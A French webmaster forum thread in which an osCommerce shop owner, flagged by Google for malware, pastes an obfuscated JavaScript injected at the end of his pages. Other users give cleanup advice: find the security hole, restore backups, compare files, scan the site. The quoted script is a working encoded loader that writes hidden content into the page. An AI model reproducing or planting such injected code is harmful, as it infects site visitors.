site piraté, malware ? Que faire ? Options

[Bertrandolivier]

Google m'a indiqué que : "Nous avons récemment constaté que certaines de vos pages pouvaient causer l'infection d'ordinateurs par des logiciels malveillants. Nous avons commencé à afficher une page d'avertissement aux internautes qui atteignent ces pages en cliquant sur un résultat de recherche Google".


A la fin du code source de mes pages, j'ai un script suivant :

</html><script>var s=' K e ro b f M h7UK 2 6 1 7 8 5 5 4 9 J h7UK s 3 3 0 8 7 7 9 5 6 J h7UK* 7F 3 7 8 4 4 J h7UK s 5 L 5 2 2 8 0 2 0 0 3 J h7UK s 6 9 7 9 0 3 8 1 1 J h7UK s 7 L 5HF 8 4 8 4 J s a r g | t } f . io f t ( \' K x ud | t ek wt b I / / d k u u t . r a | / 1 4 / z r r f . b w b " i x% w 1 " w t x v w` " 1 "Q { x v } { t uv M K / x ud | t M \' ) J K / e ro b f M';
var t='=da 8tr"0c37ni',cn=15,rn=1;
function re(s,n,r,b,e){if(s<b||s>e)return s;s-=r;if(s<b)s+=n;return s;}
var i = 0,sx="";
while(i<s.length){var ch=s.charAt(i);
var c,i1,i2;
if(ch==" "){c = s.charAt(i+1);i1=s.charCodeAt(i+1);if(i1<127)c = String.fromCharCode(re(re(re(i1,33,cn,58,90),29,cn,97,125),10,rn,48,57));i++;}
else{c=s.charCodeAt(i);if(c<127)c = re(re(re(c,33,cn,58,90),29,cn,97,125),10,rn,48,57);i1 = c>>4; i2 = (c-i1*16);c = t.charAt(i1-1)+""+t.charAt(i2);}
i++;if(c==" ")c = "\n";sx+=c;}document.write(sx);</script>


Savez-vous d'où vient ce script et comment il est généré.
Comment m'en dépatouiller ?

Mes commandes chutent... Je suis dans la panade.
Merci pour votre aide précieuse.

[chrysalide]

De toute évidence il y a faille de sécurité et il faut l'identifier.

As tu suivi les préconisations de la FAQ sur la sécurisation des boutiques Oscommerce ?

LA faille peut venir aussi de ton ordinateur de bureau ou de ceux qui exploitent le site et qui stockent des données d'accès au serveur FTP ou autres.

Un petit cheval de troie et hop tous ça est dans la nature.

As tu des sauvegardes ?

si oui c'est bien cela va t'épargner des longues heures de nettoyage de code

sinon au boulot, il faut identifier le(s) code(s) malicieux dans le script et nettoyer.

tu en a déjà trouvé un bout a voir si c'est le seul

Tu viens compléter la longue liste de boutique piratées et a chaque fois de grosses lacunes en sécurité étaient à l'origine du hack.

Ce message a été modifié par chrysalide - 12 Sep 2010, 10:46.

[Bertrandolivier]

J'ai effectivement plusieurs copies du site.

- Comment identifier les codes malicieux dans le script et nettoyer ?

- Existe t-il un logiciel capable de supposer la présence d'un mauvais code et l'identifier ?

- Quels type de fichier peut être infecté en particulier ?

Mettre en remplaçant le fichier index, cela ne fait rien.

Ce message a été modifié par Bertrandolivier - 12 Sep 2010, 11:10.

[chrysalide]

J'ai effectivement plusieurs copies du site.

Réçentes ?

- Comment identifier les codes malicieux dans le script et nettoyer ?

en le parcourant ?

- Existe t-il un logiciel capable de supposer la présence d'un mauvais code et l'identifier ?

a ma connaissance, non.

Mais certains editeurs comme notepad ++ te permettent des recherches multi-fichiers sur une chaine de caractères

- Quels type de fichier peut être infecté en particulier ?

Tous du moins les fichiers textes php, html, etc.

Mettre en remplaçant le fichier index, cela ne fait rien.

a rien si c'est pas lui d'infecté

Ce message a été modifié par chrysalide - 12 Sep 2010, 12:38.

[Quentin de Monta...]

Tu peux utiliser un comparateur de fichiers, comme winmerge par exemple, celui-ci te donne la possibilité de comparer les répertoires en te signalant ceux qui ne sont pas identiques. Il ne te reste plus alors que comparer les fichiers différents.
Cela te permets aussi de remettre à niveau ta sauvegarde en fonction de changements non effectués.

[FoxP2]

passe ton site à la moulinette : http://linkscanner.explabs.com/linkscanner/default.aspx

[chrysalide]

Merci FoxP2,

Ca je ne connaissais pas.

+1 dans mes favoris.